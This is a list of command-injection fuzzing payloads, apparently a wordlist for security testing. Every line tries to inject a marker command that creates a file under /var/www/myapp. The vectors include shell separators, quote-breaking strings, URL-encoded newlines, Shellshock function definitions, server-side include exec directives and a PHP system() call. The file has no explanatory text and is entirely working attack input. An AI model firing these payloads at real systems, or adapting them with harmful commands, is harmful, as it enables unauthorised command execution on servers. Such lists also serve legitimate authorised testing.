touch /var/www/myapp/test
 touch /var/www/myapp/test
;touch /var/www/myapp/test;
; touch /var/www/myapp/test;
;touch /var/www/myapp/test
; touch /var/www/myapp/test
;system('touch /var/www/myapp/test')
; system('touch /var/www/myapp/test')
|touch /var/www/myapp/test
| touch /var/www/myapp/test
|touch /var/www/myapp/test;
| touch /var/www/myapp/test;
&& touch /var/www/myapp/test
 && touch /var/www/myapp/test
a && touch /var/www/myapp/test
a && touch /var/www/myapp/test;
1 && touch /var/www/myapp/test
1 && touch /var/www/myapp/test;
1' && touch /var/www/myapp/test
1' && touch /var/www/myapp/test;
1' && touch /var/www/myapp/test#
a' && touch /var/www/myapp/test
a' && touch /var/www/myapp/test;
a' && touch /var/www/myapp/test#
1" && touch /var/www/myapp/test
1" && touch /var/www/myapp/test;
1" && touch /var/www/myapp/test#
a" && touch /var/www/myapp/test
a" && touch /var/www/myapp/test;
a" && touch /var/www/myapp/test#
& touch /var/www/myapp/test
 & touch /var/www/myapp/test
`touch /var/www/myapp/test`
 `touch /var/www/myapp/test`
a);touch /var/www/myapp/test
a;touch /var/www/myapp/test
a);touch /var/www/myapp/test;
a;touch /var/www/myapp/test;
a);touch /var/www/myapp/test|
a;touch /var/www/myapp/test|
a)|touch /var/www/myapp/test
a|touch /var/www/myapp/test
a)|touch /var/www/myapp/test;
a|touch /var/www/myapp/test
&lt;!--#exec%20cmd=&quot;touch%20/var/www/myapp/test&quot;--&gt;
&lt;!--#exec%20cmd=&quot;touch%20/var/www/myapp/test;--&gt;
%0Atouch%20/var/www/myapp/test
%0Atouch%20/var/www/myapp/test%0A
$;touch /var/www/myapp/test
() { :;}; /bin/bash -c "sleep 100 && touch /var/www/myapp/test"
() { :;}; /bin/bash -c "touch /var/www/myapp/test"
$(`touch /var/www/myapp/test`)
<!--#exec cmd="touch /var/www/myapp/test;-->
<?php system("touch /var/www/myapp/test");?>
touch /var/www/myapp/test #
touch /var/www/myapp/test#